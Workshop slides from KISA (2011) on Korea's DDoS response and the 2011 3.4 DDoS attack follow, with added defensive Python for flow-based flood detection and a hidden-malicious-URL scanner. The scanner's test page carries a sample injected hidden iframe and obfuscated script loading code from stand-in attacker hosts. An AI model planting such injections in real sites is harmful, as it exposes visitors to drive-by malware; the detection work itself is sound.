Capacity Development Workshop on
Public Information Management
System and Policy in Korea on cyber attacks
2011.11.28 Jeong Min, Lee
KISA
Contents
• Korea Cyber Security Framework
• DDoS Response System
  – Security Monitoring Center
  – Detection Tools
  – DNS Sinkhole
  – Cyber Cure System for Infected PCs
  – DDoS Cyber Shelter
• DDoS Response Case: 3.4 DDoS in 2011
Korea Cyber Security Framework
Cyber Crisis Response Framework (organization chart)
President
National Center for Crisis Management
Ministry of National Defense → Defense Security Command → Military Area / each unit
Korea Communications Commission → KrCERT/CC → Critical Infrastructures in Private Sector
National Intelligence Service → KNCERT/CC → Critical Infrastructures in Government/Public Sector
Security Cooperation Framework
Distributed Denial of Service Attack
DDoS Attack Response
Security Monitoring Center
Nationwide Anti-DDoS System (figure)
DDoS detection systems sit at the IX (Internet eXchange) routers between ISP A and ISP B and at the backbone routers in front of the IDCs, Internet business companies, Internet service providers, etc.
Legitimate (normal) traffic stays connected; DDoS attack traffic is blocked or detoured.
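The figure shows detection at the exchange point followed by a block-or-detour decision per destination. The following is an added example of that logic over exported flow records; it is not KISA's detection system, and the thresholds, the addresses (RFC 5737 documentation ranges) and the flow records are constructed. The block/detour split used here (drop small-packet floods at the router, send full-size floods through scrubbing) is one common policy, not something the slide specifies.

```python
"""Flow-based DDoS detection and block/detour decision at an exchange point.
Added illustration (not KISA's detection system); thresholds, addresses and
the flow records are constructed."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """One exported flow record (NetFlow/sFlow style) from an IX or backbone router."""
    src: str
    dst: str
    dport: int
    packets: int
    octets: int


# Assumed thresholds for a one-second window; an operator tunes these per link.
PPS_THRESHOLD = 10_000        # packets/s toward a single destination
SRC_THRESHOLD = 50            # distinct sources toward that destination
SMALL_PACKET_BYTES = 100      # mean size typical of SYN/UDP packet floods


def analyse(flows, window_s=1.0):
    """Aggregate flows per destination and decide: pass, block, or detour.

    block  : many-source, high-rate flood of small packets (SYN/UDP flood);
             dropped at the IX router, little legitimate traffic looks like this.
    detour : many-source, high-rate flood of full-size packets; harder to tell
             from a flash crowd, so it is routed through scrubbing instead of dropped.
    """
    per_dst = defaultdict(lambda: {"packets": 0, "octets": 0, "srcs": set()})
    for f in flows:
        agg = per_dst[f.dst]
        agg["packets"] += f.packets
        agg["octets"] += f.octets
        agg["srcs"].add(f.src)

    verdicts = {}
    for dst, agg in per_dst.items():
        pps = agg["packets"] / window_s
        mean_size = agg["octets"] / agg["packets"]
        flooded = pps >= PPS_THRESHOLD and len(agg["srcs"]) >= SRC_THRESHOLD
        if not flooded:
            action = "pass"
        elif mean_size < SMALL_PACKET_BYTES:
            action = "block"
        else:
            action = "detour"
        verdicts[dst] = {"action": action, "pps": pps,
                         "sources": len(agg["srcs"]), "mean_size": mean_size}
    return verdicts


def attack_sources(flows, verdicts):
    """Source addresses to hand to the ISPs for the destinations being blocked."""
    blocked = {d for d, v in verdicts.items() if v["action"] == "block"}
    return sorted({f.src for f in flows if f.dst in blocked})


def sample_flows():
    """Constructed one-second snapshot: a SYN flood, a large-packet flood, normal traffic."""
    flows = []
    # 200 zombies, 100 x 60-byte packets each, at the target's web port -> 20,000 pps
    flows += [Flow(f"198.51.100.{i + 1}", "192.0.2.10", 80, 100, 6_000) for i in range(200)]
    # 80 sources, 200 x 1200-byte packets each -> 16,000 pps of full-size packets
    flows += [Flow(f"203.0.113.{i + 1}", "192.0.2.20", 80, 200, 240_000) for i in range(80)]
    # 10 ordinary clients talking HTTPS to a third site -> 500 pps
    flows += [Flow(f"203.0.113.{101 + i}", "192.0.2.30", 443, 50, 40_000) for i in range(10)]
    return flows


if __name__ == "__main__":
    flows = sample_flows()
    verdicts = analyse(flows)
    for dst, v in verdicts.items():
        print(dst, v["action"], f'{v["pps"]:.0f} pps', v["sources"], "sources")
    print(len(attack_sources(flows, verdicts)), "sources to block")
```

In production the per-destination aggregates would come from the router's flow export over a sliding window and the verdict would be pushed as a null route or a BGP FlowSpec rule; the point the example makes is that the decision is taken on aggregate destination statistics, which is why a multi-source flood is visible at the IX even when each zombie sends little.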
Detection Tools: Malicious code analysis (utilizing a HoneyNet)
Web Hacking Malicious Code Detection (MC-Finder)
Scope: web service providers, all domains registered in Korea (1.8 million)
1. KISA updates the detection rules of the Malicious Code Finding System (MC-Finder)
2. MC-Finder checks websites for hidden malicious URLs (dissemination sites and routes)
3. KISA requests the ISPs (KT, T Broad, SK Broadband; staff on duty) to block foreign malicious URLs
4. KISA requests removal of the malicious URL
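Step 2 is a crawler that looks for injected content a visitor would never see. As an added example, not KISA's MC-Finder, the scanner below flags zero-size or hidden iframes, URLs whose host is on a rule list, and inline scripts that decode a long escaped blob (the usual way an injected iframe is hidden from a plain grep); it also decodes such blobs and checks the URLs inside. The blocklist, the heuristics and both sample pages are constructed.

```python
"""Scanner for hidden malicious URLs in web pages, in the spirit of MC-Finder.
Added illustration, not KISA's tool; the blocklist, heuristics and sample pages
are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed stand-in for the detection rules pushed to the scanner in step 1.
BLOCKLIST = {"malware.example.net", "drop.example.org"}
OBFUSCATION = re.compile(r"\b(unescape|eval|fromCharCode)\s*\(", re.I)
ENCODED_RUN = re.compile(r"(?:%[0-9a-f]{2}){6,}|(?:\\x[0-9a-f]{2}){6,}", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)


def _is_hidden(attrs):
    """Zero/one-pixel frames or display:none are the classic drive-by injection."""
    style = (attrs.get("style") or "").replace(" ", "").lower()

    def tiny(v):
        return v is not None and v.strip().lower().rstrip("px") in ("0", "1")

    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def _blocklisted(url):
    return urlparse(url).hostname in BLOCKLIST


class MaliciousUrlFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # (kind, evidence) pairs
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or a.get("data")      # iframe/script/img src, object data
        if tag == "script":
            self._in_script = True
        if tag == "iframe" and src and _is_hidden(a):
            self.findings.append(("hidden-iframe", src))
        if src and _blocklisted(src):
            self.findings.append(("blocklisted-url", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script that decodes a long escaped blob is how injected iframes
        # are usually hidden from a naive grep; decode it and look for URLs.
        if self._in_script and OBFUSCATION.search(data) and ENCODED_RUN.search(data):
            self.findings.append(("obfuscated-script", data.strip()[:40]))
            for url in URL_RE.findall(unquote(data)):
                if _blocklisted(url):
                    self.findings.append(("blocklisted-url", url))


def scan_page(html):
    """Return the list of (kind, evidence) findings for one fetched page."""
    parser = MaliciousUrlFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample pages: one clean, one carrying an injected hidden iframe
# plus an escaped document.write() that loads a second blocklisted host.
CLEAN_PAGE = ('<html><body><h1>Notice</h1><img src="/img/logo.png">'
              '<script src="/static/app.js"></script></body></html>')
INFECTED_PAGE = ('<html><body><p>Welcome</p>'
                 '<iframe src="http://malware.example.net/in.php" width="0" height="0"></iframe>'
                 '<script>document.write(unescape("%3C%69%66%72%61%6D%65 src=%27'
                 'http://drop.example.org/a.js%27%3E"));</script>'
                 '</body></html>')


if __name__ == "__main__":
    print(scan_page(CLEAN_PAGE))
    print(scan_page(INFECTED_PAGE))
```

Run over a crawl, `scan_page` is applied to each fetched page and the findings feed steps 3 and 4 (block requests for foreign hosts, removal requests for the rest). The obfuscation heuristic is deliberately narrow; real injections also use string splitting and charCode arrays, which a production rule set would cover, and a sandboxed browser (the HoneyNet of the previous slide) catches what static rules miss.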
DNS Sinkhole: Block Botnet
Cyber Cure System for Infected PCs
1. Collect the IPs of the infected (zombie) PCs attacking the target website
2. Operate the cyber cure system
3. The ISPs show the zombie PC's user a popup window for notification
4. Dedicated vaccine: the user downloads it and the zombie PC is cured ("Stop! Cure zombie PC")
DDoS Cyber Shelter
Case Study: Success Story of KR DDoS Attack Countermeasures by KISA
Overview of 3.4 DDoS (1)
• 2011.3.4 ~ 3.15 (about 10 days)
• Attack targets: 40 institutions
  – 24 government and public institutions
  – 9 financial institutions
  – 7 portals and shopping malls
March and July DDoS attacks are similar

Classification            | Mar 4th (2011) | July 7th (2009)
# of Zombie PCs           | 116,299        | 115,044
# of Target websites      | 40             | 36
# of Blocked C&C Servers  | 748            | 538
# of Destroyed HDDs       | 756            | 1,466
The March DDoS method was more intelligent and destructive than July's
• "The 3.4 DDoS attack attempted only to disturb the system network, with very high technology, so this attack is deemed a test-type preliminary attack for checking Korea's state of defense."
  – (Dmitri Alperovitch, vice president of McAfee, DongA Ilbo interview dated July 9, 2011)
The attack kept changing in response to each countermeasure

KISA Response                                 | Change in Attack Method
Vaccine distribution via www.boho.or.kr       | Block zombie PCs' access to www.boho.or.kr
Effective defense against the DDoS attack     | Destroy the HDD right after infection
Hard disk damage prevention guideline         | HDD is destroyed even when booting in safe mode
Nationwide Cyber Security Alert System
THANK YOU!